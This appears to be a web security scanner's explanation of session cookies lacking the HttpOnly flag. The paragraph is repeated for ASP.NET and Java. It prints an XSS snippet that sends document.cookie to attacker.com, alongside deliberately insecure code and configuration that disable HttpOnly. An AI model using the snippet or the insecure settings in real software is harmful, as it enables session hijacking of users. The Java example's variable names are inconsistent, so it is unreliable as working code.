If so, click to download 15 days full version for free!
HttpOnly is first implemented into Internet Explorer 6 by Microsoft in 2002 to protect client’s session ids, traveling through cookies, from stolen by the attacker using javascript utilizing Cross Site Scripting (XSS) vulnerability.
By using XSS if an adversary manages to execute the below Javascript in client’s browser, then he is able to steal the client’s cookies which also contain unique session ids that uniquely identifies the client after authentication.
i = new Image();
c = document.cookie;
i.src = “http://www.attacker.com/steal?c=” + c;
This vulnerability is also called Session Hijacking. There may be two ways of creating cookies containing session identifiers. Here’s the coding style;
HttpCookie cookie = new HttpCookie("SessionID", token);
cookie.HttpOnly = false;
Response.Cookies.Add(cookie);
And here’s the configuration style;
<configuration>
<system.web>
<httpCookies httpOnlyCookies="false">
None of the styles include or set HttpOnly attribute on the cookies they formed.
HttpOnly is first implemented into Internet Explorer 6 by Microsoft in 2002 to protect client’s session ids, traveling through cookies, from stolen by the attacker using javascript utilizing Cross Site Scripting (XSS) vulnerability.
By using XSS if an adversary manages to execute the below Javascript in client’s browser, then he is able to steal the client’s cookies which also contain unique session ids that uniquely identifies the client after authentication.
i = new Image();
c = document.cookie;
i.src = “http://www.attacker.com/steal?c=” + c;
This vulnerability is also called Session Hijacking. There may be two ways of creating cookies containing session identifiers. Here’s the coding style;
Cookie cookie = new Cookie("mycookie");
cookie.setValue("myvalue");
cookie.setHttpOnly(false);
response.addCookie(userCookie);
And here’s the configuration style in web.xml for session cookies for Servlet 3.0 and upwards;
<session-config>
<cookie-config>
<http-only>false</http-only>
</cookie-config>
</session-config>
If so, click to buy now for yearly subscriptions!